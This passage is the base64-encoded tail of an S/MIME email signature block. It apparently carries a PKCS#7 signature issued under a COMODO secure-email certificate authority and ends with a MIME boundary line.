go41GFSrHbQwDQYJYIZIAWUDBAIBBQCgggJhMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEw
HAYJKoZIhvcNAQkFMQ8XDTE3MDcxMjA3MDg0MFowLwYJKoZIhvcNAQkEMSIEIEMlj1oeOPnd
qmErUWDX/VslSVEbhBnSWAM+f+G4wyh8MGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEq
MAsGCWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwIC
AUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgcEGCSsGAQQBgjcQBDGBszCBsDCBmzELMAkG
A1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9y
ZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxQTA/BgNVBAMTOENPTU9ETyBTSEEtMjU2
IENsaWVudCBBdXRoZW50aWNhdGlvbiBhbmQgU2VjdXJlIEVtYWlsIENBAhAriv4GJbNgG4KO
NRhUqx20MIHDBgsqhkiG9w0BCRACCzGBs6CBsDCBmzELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RP
IENBIExpbWl0ZWQxQTA/BgNVBAMTOENPTU9ETyBTSEEtMjU2IENsaWVudCBBdXRoZW50aWNh
dGlvbiBhbmQgU2VjdXJlIEVtYWlsIENBAhAriv4GJbNgG4KONRhUqx20MA0GCSqGSIb3DQEB
AQUABIIBAGLissAeKdSLDrqo2u/7LQ5IT6MeIr9RQ52coaC7mG8LOy8StrUYuwNRmRcPQ3gf
vDFvEVEdyh6RtpUi9BIMbuNTwRd4sODDzSZHTs5YOrEXp9tc4SPuLywSdw6JZHIdyLqzapRh
5TaFZnuYGj2Otr8IhTC3ObX8Bz9XkRfLw0x185b3mZdj1OCjen8rNoNsIBpG0B/py8ZSBBRR
7tLI8EuMwenXqavXZ0dnvgE3GqgED6ebsrLTVfVmxH0V/oQTvWgWRDc5ueGgHMDPT6JcQyGP
CwkAkY2A77LdGH4c3AZ9zUDSdf9qm/w//0+4bMy2WNVuQmVHOennbs04fLYhDjsAAAAAAAA=
--------------ms080309050908020306040606--